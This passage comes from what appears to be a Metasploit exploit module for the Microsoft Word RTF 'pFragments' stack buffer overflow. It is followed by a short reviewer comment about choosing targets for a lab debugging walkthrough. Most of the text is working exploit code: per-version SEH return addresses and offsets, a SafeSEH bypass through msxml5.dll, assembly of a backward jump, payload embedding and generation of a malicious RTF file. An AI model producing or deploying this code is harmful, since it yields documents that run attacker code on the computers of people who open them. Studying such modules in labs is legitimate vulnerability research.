],
# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.
# Office v12.0.6425.1000, winword.exe v12.0.6425.1000
[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record
}
],
[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
}
],
[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
}
],
# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{
'Offsets' => [ 65535 ],
'Ret' => 0xdac0ffee
}
]
],
'DisclosureDate' => 'Nov 09 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),
])
end
def add_target(rest, targ)
targ['Offsets'].each { |off|
seh = generate_seh_record(targ.ret)
rest[off, seh.length] = seh
distance = off + seh.length
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
rest[off + seh.length, jmp_back.length] = jmp_back
}
end
def exploit
# Prepare a sample SEH frame and backward jmp for length calculations
seh = generate_seh_record(0xdeadbeef)
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string
# RTF property Array parameters
el_size = sz_rand()
el_count = sz_rand()
data = ''
# These words are presumably incorrectly used
# assert(amount1 <= amount2)
data << [0x1111].pack('v') * 2
data << [0xc8ac].pack('v')
# Filler
if target.name =~ /Debug/i
rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)
else
len = 51200 + rand(1000)
rest = rand_text(len + seh.length + jmp_back.length)
rest[0, payload.encoded.length] = payload.encoded
end
# Stick fake SEH frames here and there ;)
if target.name == "Automatic"
targets.each { |t|
next if t.name !~ /Windows/i
add_target(rest, t)
}
else
add_target(rest, target)
end
# Craft the array for the property value
sploit = "%d;%d;" % [el_size, el_count]
sploit << data.unpack('H*').first
sploit << rest.unpack('H*').first
# Assemble it all into a nice RTF
content = "{\\rtf1"
content << "{\\shp" # shape
content << "{\\sp" # shape property
content << "{\\sn pFragments}" # property name
content << "{\\sv #{sploit}}" # property value
content << "}"
content << "}"
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
def sz_rand
bad_sizes = [ 0, 2, 4, 8 ]
x = rand(9)
while bad_sizes.include? x
x = rand(9)
end
x
end
end
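Review bot: the module's own description ("stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser") is the accurate root-cause statement and should replace the Open XML converter wording in doc/7.1.9_ms_word_2010-3333.md. For the Office 2003 SP3 lab that doc specifies, note that the default 'Automatic' target writes fake SEH records for every Windows target (offsets 23532, 45944, 24580, 51156 and 5956) into one RTF; selecting 'Microsoft Office 2003 SP3 English on Windows XP SP3 English' explicitly (Offsets [24580, 51156], Ret 0x30001bdd) produces a sample containing only the frames relevant to that build, which makes the eventual 漏洞分析 walkthrough in OllyDbg much easier to follow.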